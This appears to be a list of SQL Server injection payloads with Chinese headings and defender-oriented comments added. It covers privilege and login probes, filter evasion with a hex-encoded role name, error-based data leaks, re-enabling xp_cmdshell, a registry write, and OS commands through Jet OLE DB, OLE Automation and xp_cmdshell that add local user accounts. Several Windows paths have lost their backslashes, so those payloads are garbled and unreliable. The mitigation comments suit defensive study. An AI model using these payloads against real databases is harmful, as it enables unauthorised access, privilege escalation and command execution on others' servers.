-- Reviewer notes (defender's view): this page is a list of SQL Server (T-SQL)
-- injection probe fragments, not a runnable script. Each line is meant to be
-- appended to an injectable request parameter; the `%2B` sequences are
-- URL-encoded `+`, so detection rules must decode the request before matching.
-- The first group only tells an attacker which privileges the application
-- login holds; the later `;exec` lines need sysadmin. All of them presuppose
-- request input concatenated into SQL, so the single fix is to bind values as
-- parameters and to run the application under a least-privilege login. The
-- `--` lines below say what each probe reveals and what to log or harden.
//看看是什么权限的
  -- IS_MEMBER('db_owner') returns 1 when the current login is in the db_owner
  -- database role. An application login should return 0 here; a 1 means one
  -- injection point yields full control of the database.
  and 1=(Select IS_MEMBER('db_owner'))
  -- Same test, shaped to surface the result through a type-conversion error;
  -- char(124) is '|' and brackets the value inside the error text.
  -- Mitigation: never return raw database error messages to the client.
  And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
  //检测是否有读取某数据库的权限
  -- HAS_DBACCESS('master') reports whether the login can use the master
  -- database. Application logins rarely need it; revoke it if this returns 1.
  and 1= (Select HAS_DBACCESS('master'))
  And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
  -- The next three lines are one probe for three parameter contexts (numeric,
  -- quoted string, LIKE search). Each forces the login name (user) into a
  -- numeric comparison so it leaks through the conversion error message.
  数字类型
  and char(124)%2Buser%2Bchar(124)=0
  字符类型
  ' and char(124)%2Buser%2Bchar(124)=0 and ''='
  搜索类型
  ' and char(124)%2Buser%2Bchar(124)=0 and '%'='
  爆用户名
  -- user>0 relies on the same error-based leak. Detection: a burst of
  -- string-to-int conversion errors in the SQL Server error log correlated
  -- with one client session or source address.
  and user>0
  ' and user>0 and ''='
  检测是否为SA权限
  -- IS_SRVROLEMEMBER('sysadmin') = 1 means the login is a server admin; every
  -- later step on this page (registry write, command execution) depends on
  -- it. No web application login should ever be in sysadmin.
  and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
  -- Same check with the role name passed as a hex (UTF-16) literal instead of
  -- a string, so a keyword filter looking for 'sysadmin' will not see it —
  -- signature matching is a weak control compared with parameterisation.
  And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
  检测是不是MSSQL数据库
  -- Engine fingerprint: sysobjects is a SQL Server system table.
  and exists (select * from sysobjects);--
  检测是否支持多行
  -- Stacked-query test: a harmless DECLARE after ';'. If it succeeds, the
  -- driver executes several statements per call, which is what every `;exec`
  -- line below needs. Parameterised statements remove this vector.
  ;declare @d int;--
  恢复 xp_cmdshell
  -- Re-registers the xp_cmdshell extended procedure (needs sysadmin).
  -- Detection: audit calls to sp_addextendedproc and any execution of
  -- xp_cmdshell; both are anomalous from an application login.
  ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
  -- Ad hoc OPENROWSET to another SQL Server with a plaintext credential in the
  -- connection string. Keep ad hoc distributed queries disabled, and treat any
  -- uid/pwd pair that shows up in request logs as compromised.
  select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
  //-----------------------
  //      执行命令
  //-----------------------
  首先开启沙盘模式:
  -- xp_regwrite changes the Jet engine's SandBoxMode registry value,
  -- presumably so the Jet OLE DB provider will evaluate shell() inside a
  -- query. A registry write by the SQL Server service account is a
  -- high-fidelity alert on its own.
  exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1
  然后利用jet.oledb执行系统命令
  -- OS command execution through the Jet provider (here: adding a local user).
  -- Mitigations: remove or deny the Jet OLE DB provider on the server, run the
  -- SQL Server service as a low-privilege account, and alert on cmd.exe /
  -- net.exe process creation whose parent is sqlservr.exe.
  select * from openrowset('microsoft.jet.oledb.4.0',';database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
  执行命令
  -- Same outcome via OLE Automation (SP_OAcreate / SP_OAMETHOD on
  -- wscript.shell). Keep the OLE Automation Procedures option disabled.
  ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user paf pafpaf /add';--
  -- Direct xp_cmdshell use. Keep the xp_cmdshell option off and, more
  -- importantly, keep the application login out of sysadmin so it cannot
  -- switch the option back on.
  EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:1111'
  判断xp_cmdshell扩展存储过程是否存在:
  -- Full example request: checks whether xp_cmdshell is registered in
  -- master.dbo.sysobjects (xtype 'X' = extended stored procedure). The
  -- `keyno=` parameter is the injection point; SQL text of this shape in a
  -- request line is exactly what a WAF/IDS rule should match and log.
  http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')